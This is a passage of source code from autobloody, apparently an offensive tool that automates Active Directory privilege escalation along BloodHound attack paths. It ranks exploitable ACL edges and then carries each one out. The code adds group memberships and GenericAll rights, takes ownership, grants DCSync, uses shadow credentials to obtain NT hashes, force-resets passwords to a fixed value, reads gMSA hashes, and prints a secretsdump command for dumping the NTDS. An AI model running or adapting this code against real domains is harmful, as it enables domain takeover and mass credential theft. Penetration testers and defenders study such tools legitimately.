"Group", 65 | }, 66 | {"cost": 200, "edges": "WriteDacl|Owns", "endnode": "Group"}, 67 | {"cost": 300, "edges": "WriteOwner", "endnode": "Group"}, 68 | # If we already have GenericAll right on OU we must ensure inheritance or we'll add a new GenericAll ACE with inheritance 69 | {"cost": 400, "edges": "Contains|GenericWrite|GenericAll", "endnode": "OU"}, 70 | {"cost": 500, "edges": "WriteDacl|Owns", "endnode": "OU"}, 71 | {"cost": 600, "edges": "WriteOwner", "endnode": "OU"}, 72 | {"cost": 10000, "edges": "Contains|GenericWrite|GenericAll", "endnode": "GPO"}, 73 | {"cost": 11000, "edges": "WriteDacl|Owns", "endnode": "GPO"}, 74 | {"cost": 12000, "edges": "WriteOwner", "endnode": "GPO"}, 75 | { 76 | "cost": 100000, 77 | "edges": "GenericWrite|GenericAll|AllExtendedRights|Contains", 78 | "endnode": "User", 79 | }, 80 | {"cost": 100001, "edges": "WriteDacl|Owns", "endnode": "User"}, 81 | {"cost": 100002, "edges": "WriteOwner", "endnode": "User"}, 82 | { 83 | "cost": 100000, 84 | "edges": "GenericWrite|GenericAll|AllExtendedRights|Contains", 85 | "endnode": "Computer", 86 | }, 87 | {"cost": 100001, "edges": "WriteDacl|Owns", "endnode": "Computer"}, 88 | {"cost": 100002, "edges": "WriteOwner", "endnode": "Computer"}, 89 | { 90 | "cost": 110000, 91 | "edges": "ForceChangePassword", 92 | "endnode": "", 93 | }, 94 | ] 95 | for bloodycost in bloodycosts: 96 | endnode = ":" + bloodycost['endnode'] if bloodycost['endnode'] else "" 97 | tx.run( 98 | f"MATCH ()-[r:{bloodycost['edges']}]->({endnode}) SET" 99 | f" r.bloodycost = {bloodycost['cost']}" 100 | ) 101 | 102 | @staticmethod 103 | def _createGraph(tx): 104 | graph_exists = tx.run("RETURN gds.graph.exists('autobloody')").single()[0] 105 | if graph_exists: 106 | tx.run("CALL gds.graph.drop('autobloody')") 107 | tx.run( 108 | "CALL gds.graph.project('autobloody','*',{all:{type:'*'," 109 | " properties:{bloodycost:{defaultValue:9999999999}}}},{validateRelationships:true})" 110 | ) 111 | 112 | def _findShortestPath(self, tx, source, target): 113 | if self.gds_available: 114 | # Use GDS plugin for better performance 115 | result = ( 116 | tx.run( 117 | "MATCH (s {name:$source}) MATCH (t {name:$target}) CALL" 118 | " gds.shortestPath.dijkstra.stream('autobloody',{sourceNode:s," 119 | " targetNode:t, relationshipWeightProperty:'bloodycost'})YIELD path" 120 | " RETURN path", 121 | source=source, 122 | target=target, 123 | ) 124 | ).single() 125 | if not result: 126 | raise ValueError("No path exploitable by autobloody found") 127 | return result[0].relationships 128 | else: 129 | # Use native CYPHER for shortest path (slower but doesn't require GDS) 130 | # This implementation uses built-in shortestPath with cost accumulation 131 | # Limited to 20 hops max to avoid performance issues 132 | # Only consider relationships that have bloodycost set (exploitable edges) 133 | result = tx.run( 134 | """ 135 | MATCH path = shortestPath((start {name: $source})-[*..20]->(end {name: $target})) 136 | WHERE ALL(r IN relationships(path) WHERE r.bloodycost IS NOT NULL) 137 | WITH path, relationships(path) as rels 138 | WITH path, reduce(cost = 0, r in rels | cost + r.bloodycost) as totalCost 139 | RETURN path 140 | ORDER BY totalCost 141 | LIMIT 1 142 | """, 143 | source=source, 144 | target=target, 145 | ).single() 146 | 147 | if not result: 148 | raise ValueError("No path exploitable by autobloody found") 149 | return result[0].relationships 150 | -------------------------------------------------------------------------------- /autobloody/automation.py: -------------------------------------------------------------------------------- 1 | from bloodyAD import ConnectionHandler 2 | from bloodyAD.cli_modules import add, set, remove, get 3 | from badldap.commons.exceptions import LDAPModifyException 4 | import logging, re, copy 5 | # Constant for password changes 6 | PASSWORD_DEFAULT = "AutoBl00dy123!" 7 | LOG = logging.getLogger('autobloody') 8 | 9 | class Automation: 10 | def __init__(self, args, path): 11 | self.co_args = args 12 | self.path = path 13 | self.rel_types = { 14 | 0: self._nextHop, 15 | 1: self._dcSync, 16 | 2: self._setDCSync, 17 | 3: self._ownerDomain, 18 | 10: self._readGMSAPassword, 19 | 100: self._addMember, 20 | 200: self._aclGroup, 21 | 300: self._ownerGroup, 22 | 400: self._genericAll, 23 | 500: self._genericAll, 24 | 600: self._ownerContainer, 25 | 10000: self._genericAll, 26 | 11000: self._genericAll, 27 | 12000: self._ownerContainer, 28 | 100000: self._shadowCredentialsOrForceChange, 29 | 100001: self._aclPrincipal, 30 | 100002: self._ownerPrincipal, 31 | 110000: self._forceChangePassword, 32 | } 33 | self.dirty_laundry = [] 34 | 35 | async def simulate(self): 36 | self.simulation = True 37 | self.rel_str = { 38 | "setDCSync": "[Add DCSync right] to {}", 39 | "groupMember": "[Membership] on group {} for {}", 40 | "genericAll": "[GenericAll given] on {} to {}", 41 | "owner": "[Ownership Given] on {} to {}", 42 | "password": "[Change password] of {} to {}", 43 | "readGMSAPassword": "[Read GMSA Password] from {}", 44 | "shadowCredentials": "[Add Shadow Credentials] (if fails, fallback to password change) to {}", 45 | } 46 | print(f"\nAuthenticated as {self.co_args.username}:\n") 47 | await self._unfold() 48 | 49 | async def exploit(self): 50 | self.simulation = False 51 | # Add missing attributes for bloodyAD 2.x compatibility 52 | if not hasattr(self.co_args, 'gc'): 53 | self.co_args.gc = False 54 | if not hasattr(self.co_args, 'dc_ip'): 55 | self.co_args.dc_ip = "" 56 | if not hasattr(self.co_args, 'format'): 57 | self.co_args.format = "" 58 | if not hasattr(self.co_args, 'dns'): 59 | self.co_args.dns = "" 60 | # timeout is now passed from argparse, no need to set default here 61 | # Convert kerberos boolean to krb_args list format expected by bloodyAD 2.x 62 | # Empty list means kerberos is enabled, None means disabled 63 | if hasattr(self.co_args, 'kerberos') and self.co_args.kerberos: 64 | self.co_args.kerberos = [] 65 | else: 66 | self.co_args.kerberos = None 67 | # Convert secure boolean to integer format expected by bloodyAD 2.x 68 | if hasattr(self.co_args, 'secure') and self.co_args.secure: 69 | self.co_args.secure = 1 70 | else: 71 | self.co_args.secure = 0 72 | 73 | self.conn = ConnectionHandler(self.co_args) 74 | await self._unfold() 75 | 76 | async def _unfold(self): 77 | for rel in self.path: 78 | if not self.simulation: 79 | print() 80 | typeID = rel["cost"] 81 | try: 82 | await self.rel_types[typeID](rel) 83 | except Exception as e: 84 | await self._washer() 85 | # Quick fix for issue #5 remove it when dropping Neo4j dependency 86 | if typeID == 9999999999: 87 | raise ValueError("The path you're trying to exploit is not exploitable by autobloody only, you may need other tools to exploit it. See #Limitations in the README") 88 | raise e 89 | 90 | async def _washer(self): 91 | if self.simulation: 92 | print() 93 | self.dirty_laundry.reverse() 94 | for laundry in self.dirty_laundry: 95 | if self.simulation: 96 | self._printOperation(laundry["f"].__name__, laundry["args"], True) 97 | else: 98 | await laundry["f"](self.conn, *laundry["args"]) 99 | self.dirty_laundry = [] 100 | 101 | async def _switchUser(self, user, pwd, dom=None): 102 | await self._washer() 103 | if self.simulation: 104 | print(f"\nAuthenticated as {user}:\n") 105 | else: 106 | # Close current connection 107 | await self.conn.closeLdap() 108 | 109 | # Create new args for the new user 110 | new_args = copy.copy(self.co_args) 111 | new_args.username = user 112 | new_args.password = pwd 113 | if dom: 114 | new_args.domain = dom 115 | 116 | # Clear old credentials to avoid mixing credential types 117 | new_args.certificate = None 118 | new_args.kerberos = None 119 | 120 | # Create new ConnectionHandler with new credentials 121 | self.conn = ConnectionHandler(new_args) 122 | 123 | async def _nextHop(self, rel): 124 | return 125 | 126 | async def _dcSync(self, rel): 127 | if not self.simulation: 128 | print( 129 | "[+] You can now dump the NTDS using: secretsdump.py" 130 | f" '{self.conn.conf.domain}/{self.conn.conf.username}:{self.conn.conf.password}@{self.conn.conf.host}'" 131 | ) 132 | 133 | async def _setDCSync(self, rel): 134 | operation = add.setDCSync 135 | if self.simulation: 136 | user = rel["start_node"]["name"] 137 | self._printOperation(operation.__name__, [user]) 138 | else: 139 | user = rel["start_node"]["distinguishedname"] 140 | await operation(self.conn, user) 141 | 142 | async def _ownerDomain(self, rel): 143 | await self._setOwner(rel) 144 | await self._setDCSync(rel) 145 | 146 | async def _addMember(self, rel): 147 | add_operation = add.groupMember 148 | member = rel["start_node"]["name"] 149 | group = rel["end_node"]["name"] 150 | if self.simulation: 151 | self._printOperation(add_operation.__name__, [group, member]) 152 | else: 153 | member_sid = rel["start_node"]["objectid"] 154 | group_dn = rel["end_node"]["distinguishedname"] 155 | try: 156 | await add_operation(self.conn, group_dn, member_sid) 157 | # Close connection to apply changes 158 | await self.conn.closeLdap() 159 | self.dirty_laundry.append({"f": remove.groupMember, "args": [group_dn, member_sid]}) 160 | except LDAPModifyException as e: 161 | # Check if it's an entryAlreadyExists error 162 | if e.resultcode == 68: 163 | LOG.warning(f"{member} already in {group}, continuing exploitation...") 164 | else: 165 | raise e 166 | 167 | async def _aclGroup(self, rel): 168 | await self._genericAll(rel) 169 | await self._addMember(rel) 170 | 171 | async def _ownerGroup(self, rel): 172 | await self._setOwner(rel) 173 | await self._aclGroup(rel) 174 | 175 | async def _aclPrincipal(self, rel): 176 | await self._genericAll(rel) 177 | await self._shadowCredentialsOrForceChange(rel) 178 | 179 | async def _ownerPrincipal(self, rel): 180 | await self._setOwner(rel) 181 | await self._aclPrincipal(rel) 182 | 183 | async def _ownerContainer(self, rel): 184 | await self._setOwner(rel) 185 | await self._genericAll(rel) 186 | 187 | async def _shadowCredentialsOrForceChange(self, rel): 188 | """ 189 | Try to use shadowCredentials first, fall back to forceChangePassword if not possible 190 | """ 191 | shadow_operation = add.shadowCredentials 192 | if self.simulation: 193 | target = rel["end_node"]["name"] 194 | self._printOperation(shadow_operation.__name__, [target]) 195 | else: 196 | target = rel["end_node"]["samaccountname"] 197 | target_dn = rel["end_node"]["distinguishedname"] 198 | 199 | # Try shadowCredentials 200 | LOG.debug("Attempting shadowCredentials attack") 201 | try: 202 | key_matches, result = await extractFromLogs(r'key: (\S+)', shadow_operation, self.conn, target_dn) 203 | # Retrieve all the groups of the first key match from logged output 204 | key_groups = key_matches[0].groups() if key_matches else None 205 | key = None 206 | # If we have key groups, extract the key 207 | if key_groups: 208 | key = key_groups[0] 209 | else: 210 | LOG.warning("Could not extract key from shadowCredentials logs, key won't be removed after exploit") 211 | 212 | pwd = ":" + result[0]['NT'] 213 | print(f"Successfully obtained NT hash of {target} via shadowCredentials: {result[0]['NT']}") 214 | # Pass NT hash in the format ":nt_hash" for NTLM authentication 215 | LOG.info(f"Switching to user: {target}") 216 | self.dirty_laundry.append({"f": remove.shadowCredentials, "args": [target_dn, key]}) 217 | await self._switchUser(target, pwd, dom=rel["end_node"]["domain"]) 218 | except Exception as e: 219 | # If shadowCredentials fails, fall back to forceChangePassword 220 | LOG.warning(f"shadowCredentials failed: {e}, falling back to forceChangePassword") 221 | await self._forceChangePassword(rel) 222 | 223 | # ForceChangePassword edge directly changes the password 224 | async def _forceChangePassword(self, rel): 225 | pwd = PASSWORD_DEFAULT 226 | pwd_operation = set.password 227 | if self.simulation: 228 | user = rel["end_node"]["name"] 229 | self._printOperation(pwd_operation.__name__, [user, pwd]) 230 | else: 231 | user_dn = rel["end_node"]["distinguishedname"] 232 | await pwd_operation(self.conn, user_dn, pwd) 233 | user = rel["end_node"]["samaccountname"] 234 | LOG.info(f"switching to LDAP connection for user {user}") 235 | await self._switchUser(user, pwd, dom=rel["end_node"]["domain"]) 236 | 237 | async def _genericAll(self, rel): 238 | add_operation = add.genericAll 239 | if self.simulation: 240 | user = rel["start_node"]["name"] 241 | target = rel["end_node"]["name"] 242 | self._printOperation(add_operation.__name__, [target, user]) 243 | else: 244 | user = rel["start_node"]["distinguishedname"] 245 | target = rel["end_node"]["distinguishedname"] 246 | await add_operation(self.conn, target, user) 247 | self.dirty_laundry.append({"f": remove.genericAll, "args": [target, user]}) 248 | 249 | async def _setOwner(self, rel): 250 | operation = set.owner 251 | if self.simulation: 252 | user = rel["start_node"]["name"] 253 | target = rel["end_node"]["name"] 254 | self._printOperation(operation.__name__, [target, user]) 255 | else: 256 | user = rel["start_node"]["distinguishedname"] 257 | target = rel["end_node"]["distinguishedname"] 258 | await operation(self.conn, target, user) 259 | 260 | async def _readGMSAPassword(self, rel): 261 | """Exploit ReadGMSAPassword edge to retrieve GMSA password""" 262 | if self.simulation: 263 | target = rel["end_node"]["name"] 264 | self._printOperation("readGMSAPassword", [target]) 265 | else: 266 | target = rel["end_node"]["samaccountname"] 267 | target_dn = rel["end_node"]["distinguishedname"] 268 | 269 | # Read msDS-ManagedPassword attribute from the GMSA account 270 | # This returns a list with one dictionary like [{'NT': 'hash', 'B64ENCODED': 'base64string'}] 271 | nthash = None 272 | async for entry in get.object(self.conn, target_dn, attr="msDS-ManagedPassword"): 273 | if "msDS-ManagedPassword" in entry: 274 | nthash = entry["msDS-ManagedPassword"][0]['NT'] 275 | break 276 | 277 | if nthash: 278 | print(f"From {target}, retrieved GMSA NT hash: {nthash}") 279 | # Pass NT hash in the format ":nt_hash" for NTLM authentication 280 | pwd = ":"+nthash 281 | LOG.info(f"Switching to GMSA account: {target}") 282 | await self._switchUser(target, pwd, dom=rel["end_node"]["domain"]) 283 | else: 284 | raise ValueError("Failed to retrieve GMSA password") 285 | 286 | 287 | def _printOperation(self, operation_name, operation_args, revert=False): 288 | operation_str = "\t" 289 | if revert: 290 | operation_str += "[-] Revert " 291 | else: 292 | operation_str += "[+] " 293 | 294 | operation_str += self.rel_str[operation_name] 295 | arg_nb = operation_str.count("{") 296 | print(operation_str.format(*operation_args[:arg_nb])) 297 | 298 | 299 | 300 | # Utilities 301 | class Grabber(logging.Handler): 302 | def __init__(self, pattern): 303 | super().__init__() 304 | self.matches = [] 305 | self.pattern = pattern 306 | 307 | def emit(self, record: logging.LogRecord): 308 | msg = record.getMessage() 309 | m = re.search(self.pattern, msg) 310 | if m: 311 | self.matches.append(m) 312 | 313 | async def extractFromLogs(pattern, function, *args, **kwargs): 314 | logger = logging.getLogger('bloodyAD') 315 | logger.setLevel(logging.INFO) 316 | grabber = Grabber(pattern) 317 | logger.addHandler(grabber) 318 | try: 319 | results = await function(*args, **kwargs) 320 | finally: 321 | logger.removeHandler(grabber) 322 | return (grabber.matches, results) --------------------------------------------------------------------------------